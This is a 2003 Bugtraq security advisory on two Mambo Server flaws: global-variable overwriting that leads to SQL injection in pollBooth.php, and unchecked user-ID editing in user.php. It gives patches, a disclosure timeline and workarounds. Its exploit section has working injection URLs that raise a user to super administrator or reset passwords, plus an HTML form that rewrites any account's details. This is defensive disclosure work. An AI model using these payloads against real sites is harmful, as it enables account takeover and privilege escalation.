[SCSA-023] Multiple vulnerabilities in Mambo Server

From: Security Corporation Security Advisory (advisory_at_security-corporation.com)
Date: 12/10/03

  • Next message: Rafel Ivgi: "GeoHttpServer[webcam] Causes MFC42.DLL to overflow"
    To: bugtraq@securityfocus.com
    Date: Wed, 10 Dec 2003 20:49:33 GMT
    
    

    ======================================================================
    Security Corporation Security Advisory [SCSA-023]

    Multiple vulnerabilities in Mambo Server
    ======================================================================

    PROGRAM: Mambo Server
    HOMEPAGE: http://www.mamboserver.com
    VULNERABLE VERSIONS: 4.0.14 and 4.5 Beta 1.0.3
    RISK: Low/MEDIUM
    IMPACT: Redefining of configuration variables
    Change of members's and administrator's informations

    RELEASE DATE: 2003-12-10

    ======================================================================
    TABLE OF CONTENTS
    ======================================================================

    1..........................................................DESCRIPTION
    2..............................................................DETAILS
    3.............................................................EXPLOITS
    4............................................................SOLUTIONS
    5...........................................................WORKAROUND
    6..................................................DISCLOSURE TIMELINE
    7..............................................................CREDITS
    8...........................................................DISCLAIMER
    9...........................................................REFERENCES
    10............................................................FEEDBACK

    1. DESCRIPTION
    ======================================================================

    "Mambo Open Source is the finest open source Web Content Management
    System available today. Mambo Open Source makes communicating via
    the Web easy"

    (direct quote from Mambo Server website)

    2. DETAILS
    ======================================================================

    > Version 4.0.14 :

     - Redefining of configuration variables :

    A vulnerability has been discovered in the regglobals.php file that
    allows unauthorized users to redefine configuration variables.

    Vulnerable code :

     ----------------------------------------------------
    <?php
    if (!ini_get('register_globals')) {
    session_start();
    $raw = phpversion();
    list($v_Upper,$v_Major,$v_Minor) = explode(".",$raw);
    if(($v_Upper > 4 && $v_major < 1) || $v_Upper < 4){
    $_FILES = $HTTP_POST_FILES;
    $_ENV = $HTTP_ENV_VARS;
    $_GET = $HTTP_GET_VARS;
    $_POST = $HTTP_POST_VARS;
    $_COOKIE = $HTTP_COOKIE_VARS;
    $_SERVER = $HTTP_SERVER_VARS;
    $_SESSION = $HTTP_SESSION_VARS;
    $_FILES = $HTTP_POST_FILES;
    }
    while(list($key,$value)=each($_FILES)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_ENV)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_GET)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_POST)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_COOKIE)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_SERVER)) $GLOBALS[$key]=$value;
    while(list($key,$value)=each($_SESSION)) $GLOBALS[$key]=$value;
    foreach($_FILES as $key => $value) {
    $GLOBALS[$key]=$_FILES[$key]['tmp_name'];
    foreach($value as $ext => $value2) {
    $key2 = $key."_".$ext;
    $GLOBALS[$key2]=$value2;
    }
    }
    }
    ?>
     ----------------------------------------------------

    We see at first that if register_globals=OFF, all the variables
    FILES, ENV, GET, POST, COOKIE, SERVER and SESSION will be
    redefined as global variables (GLOBAL).

    Only this code raises no problem of security.

    But if the files : banners.php, pollBooth.php, upload.php,
    usermenu.php and userpage.php, we can see the following code :

     ------------------------------
    include ("configuration.php");
    [...]
    include ("regglobals.php");
     ------------------------------

    The configuration.php file contains variables as :

     ------------------------------------------------------------
    $host = 'localhost'; // This is normally set to localhost
    $user = ''; // MySQL username
    $password = ''; // MySQL password
    $db = ''; // MySQL database name
    $dbprefix = 'mos_'; // Do not change unless you need to!
     ------------------------------------------------------------
    ...

    It is then possible to an attacker to give new values to
    all the variables of configurations.

    For example the pollBooth.php file :

     ----------------------------------------------------
    include("configuration.php");
    include('language/'.$lang.'/lang_poll.php');
    include("regglobals.php");
    [...]
    switch ($task){
    case "Vote":
    addvote($voteID, $cook, $polls, $dbprefix);
    break;
    [...]
    }

    function addvote($voteID, $cook, $pollID, $dbprefix){
    if ($database==""){
    require("classes/database.php");
    $database = new database();
    }
    global $sessioncookie;
    if (empty($sessioncookie)) {
    print "<SCRIPT>alert(\""._ALERT_ENABLED."\");
    window.history.go(-1);</SCRIPT>\n";
    } else {
    if($cook == "1") {
    print "<SCRIPT> alert(\""._ALREADY_VOTE."\");
    window.history.go(-1);</SCRIPT>\n";
    }
    else {
    if ($voteID == 0){
    print "<SCRIPT>alert(\""._NO_SELECTION."\");
    window.history.go(-1);</SCRIPT>\n";
    }
    $cvalue = "1";
    $cookiename="voted".$pollID;
    setcookie("$cookiename", $cvalue, time()+87640);
    }

    if($cook == "") {
    if ($voteID > 0) {
    $query = "UPDATE ".$dbprefix."poll_data SET optionCount=optionCount + 1
    WHERE pollid='$pollID' AND voteid='$voteID'";
    $database->openConnectionNoReturn($query);
    $voters = $voters + 1;
    $query = "UPDATE ".$dbprefix."poll_desc SET voters=voters + 1 WHERE
    pollID='$pollID'";
    $database->openConnectionNoReturn($query);

    $today = date("Y-m-d G:i:s");
    $query = "INSERT INTO ".$dbprefix."poll_date SET date='$today',
    vote_id='$voteID', poll_id='$pollID'";
    $database->openConnectionNoReturn($query);

    echo "<SCRIPT> alert(\""._THANKS."\"); window.history.go(-1);</SCRIPT>";
    }
    }
    }
    }

    [...]
     ----------------------------------------------------

    It is thus possible to execute any request UPDATE via
    the pollBooth.php file if register_globals=OFF.

    > Version 4.5 Beta 1.0.3 :

     - Change of members's and administrator's informations :

    A vulnerability has been discovered in the components/com_user/user.php
    file that allows unauthorized users to change members's and
    administrator's informations.

    Vulnerable code :

     ---------------------------------------------------
    [...]
    switch( $task ) {
    [...]
    case "saveUserEdit":
    userSave( $option, $my->id );
    break;
    [...]
    }
    [...]
    function userSave( $option, $uid) {
    global $database;
    if ($uid == 0) {
    echo _NOT_AUTH;
    return;
    }
    $row = new mosUser($database);

    if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) {
    $row->load($_POST["id"]);
    $row->orig_password = $row->password;
    }
    if (!$row->bind( $_POST )) {
    echo "<script> alert('".$row->getError()."'); window.history.go(-1);
    </script>\n";
    exit();
    }

    if(isset($_POST["password"]) && $_POST["password"] != "") {
    if(isset($_POST["verifyPass"]) && ($_POST["verifyPass"] ==
    $_POST["password"])) {
    $row->password = md5($_POST["password"]);
    } else {
    echo "<script> alert('Passwords do not match'); window.history.go(-1);
    </script>\n";
    exit();
    }
    } else {
    // Restore 'original password'
    $row->password = $row->orig_password;
    }
    if (!$row->check()) {
    echo "<script> alert('".$row->getError()."'); window.history.go(-1);
    </script>\n";
    exit();
    }

    unset($row->orig_password); // prevent DB error!!

    if (!$row->store()) {
    echo "<script> alert('".$row->getError()."'); window.history.go(-1);
    </script>\n";
    exit();
    }

    mosRedirect( "index.php?option=$option" );
    }
    [...]
     ----------------------------------------------------

    It's possible for an attacker to modify many informations about
    an account via his ID like password, email, name etc...

    3. EXPLOITs
    ======================================================================

    > Version 4.0.14 :

     - Redefining of configuration variables (if magic_quotes_gpc=OFF):

    # The title of the article N░23 becomes "hop" :
    http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
    voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112)
    %20WHERE artid=23/*

    # The user having id 52 becomes "super administrator" :
    http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
    voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117,
    112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114)
    %20WHERE%20id=52/*

    # The password of the user having id 10 becomes 'a' :
    http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
    voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97))
    %20WHERE%20id=10/*

    > Version 4.5 Beta 1.0.3 :

     - Change of members's and administrator's informations :

    Here is an example that permit to modify informations
    about an ID account :

     --------------------exploit.html--------------------
    <html>
    <head></head>
    <body>
    <form action="http://[target]/index.php" method="post">
    New Name : <inputtype="text" name="name" value=""><br>
    New E-mail : <input type="text" name="email" value="" size="30"><br>
    New UserName : <input type="text" name="username" value=""><br>
    New Password : <input type="password" name="password" value=""><br>
    Verfiy New Pass : <input type="password" name="verifyPass"><br>
    ID : <input type="text" name="id" value="1"><br>
    <input type="hidden" name="option" value="com_user">
    <input type="hidden" name="task" value="saveUserEdit">
    <input type="submit" name="submit" value="Update"><br>
    </form>
    </body>
    </html>
     --------------------exploit.html--------------------

    4. SOLUTIONS
    ======================================================================

    You can found patchs at the following link : http://www.phpsecure.info

    The creator (Robert Castley) was notified, published a patch 2 for
    version 4.0.1 (works only if the patch 1 was installed) and a Beta
    1.0.14 version 4.5 was published for the vulnerabilities of 1.0.13.

    5. WORKAROUND
    ======================================================================

    > Version 4.0.14 :

    In banners.php, pollBooth.php, upload.php, usermenu.php and
    userpage.php simply add the following line as FIRST LINE,
    and delete the other inclusions of this file :

     ---------------------------
    include ("regglobals.php");
     ---------------------------

    > Version 4.5 Beta 1.0.3 :

    In the components/com_user/user.php file, in the userSave() function,
    replace the following lines :

     ----------------------------------------------------
    if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "")) {
    $row->load($_POST["id"]);
    $row->orig_password = $row->password;
    }
     ----------------------------------------------------

    by

     ----------------------------------------------------
    if(isset($_POST["id"]) && ($_POST["id"] != null || $_POST["id"] != "") &&
    $_POST["id"] == $uid) {
    $row->load($_POST["id"]);
    $row->orig_password = $row->password;
    }else{
    die("Bad User Id");
    }
     ----------------------------------------------------

     

    6. DISCLOSURE TIMELINE
    ======================================================================

    25/11/2003 Vulnerability discovered
    25/11/2003 Vendor notified
    25/11/2003 Vendor response
    25/11/2003 Security Corporation clients notified
    28/11/2003 Started e-mail discussions
    09/12/2003 Last e-mail received
    10/12/2003 Public disclosure

    7. CREDITS
    ======================================================================

    frog-m@n <frog-man@security-corporation.com> is credited with this discovery

    Nicolas DE RYCKE <http://www.knowckers.org> is greeted.

    8. DISLAIMER
    ======================================================================

    The information within this paper may change without notice. Use of
    this information constitutes acceptance for use in an AS IS condition.
    There are NO warranties with regard to this information. In no event
    shall the author be liable for any damages whatsoever arising out of
    or in connection with the use or spread of this information. Any use
    of this information is at the user's own risk.

    9. REFERENCES
    ======================================================================

     - Original Version:
    http://www.security-corporation.com/advisories-023.html

     - Version Franšaise:
    http://www.security-corporation.com/index.php?id=advisories&a=023-FR

    10. FEEDBACK
    ======================================================================

    Please send suggestions, updates, and comments to:

    Security Corporation
    http://www.security-corporation.com
    advisory@security-corporation.com


  • Next message: Rafel Ivgi: "GeoHttpServer[webcam] Causes MFC42.DLL to overflow"

    Relevant Pages